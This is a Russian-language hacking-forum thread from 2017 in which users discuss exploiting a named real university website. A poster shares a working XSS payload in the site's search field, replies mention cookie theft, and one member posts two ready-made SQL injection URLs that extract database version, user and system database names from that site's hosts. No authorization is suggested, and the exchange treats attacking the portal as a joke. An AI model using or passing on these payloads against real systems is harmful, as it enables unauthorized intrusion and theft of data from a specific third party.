xss уязвимость

Discussion in 'Песочница' started by qwebdev, 1 Apr 2017.

  1. qwebdev

    qwebdev New Member

    Joined:
    26 Feb 2017
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Нашел на сайте http://abc.vvsu.ru/ xss-уязвимость,
    при вводе
    "><script>alert('xss')</script>"<input
    в поле "Контекстный поиск:" выводится alert с текстом xss,
    что делать дальше пока не представляю, есть идеи?

    Так же если в это же поле забить кавычку, то выпадает
    [Microsoft][ODBC SQL Server Driver][SQL Server]Íå óäàåòñÿ îòêðûòü áàçó äàííûõ "Logs", çàïðàøèâàåìóþ èìåíåì âõîäà. Íå óäàëîñü âûïîëíèòü âõîä.
    Можно ли как-то использовать этот косяк?
     
  2. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Я бы помог. Но мало того, что это .ru, это еще и гос сайт. с ' очевидно что скуля. А с хсской куча векторов но все они клиентские. От угона куков до хека тачки
     
    _________________________
    Gorev likes this.
  3. leksadin

    leksadin Level 8

    Joined:
    19 Jan 2016
    Messages:
    128
    Likes Received:
    60
    Reputations:
    12

    Про xss - можно почитать тут

    По подову SQL - ошибка вылетает при любом запросе, не обязательно кавычке. Так что это проблемы у них с базой данных.
    Вообще про sql можно почитать, например, здесь
     
    Gorev likes this.
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Code:
    http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6+--+
    но это уже совсем другая история
    Code:
    http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,null,null,(select+char(126)%2bchar(39)%2bname%2bchar(39)%2bchar(126)+from+master..sysdatabases+where+dbid=1),null,null,null,null--
    а вот это твоя история
     
    #4 Gorev, 5 Apr 2017
    Last edited: 5 Apr 2017
    K800 likes this.
  5. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Да ВЫ бессмерты, Сударь. Хекать так спокойно гос портал, да ещё и рушный.
     
    _________________________
    leksadin likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Отнюдь, милорд, я лишь указал направление, вектор так сказать...
     
Loading...
Similar Threads - уязвимость
  1. zase
    Replies:
    1
    Views:
    3,555
  2. Shadows_God
    Replies:
    14
    Views:
    8,085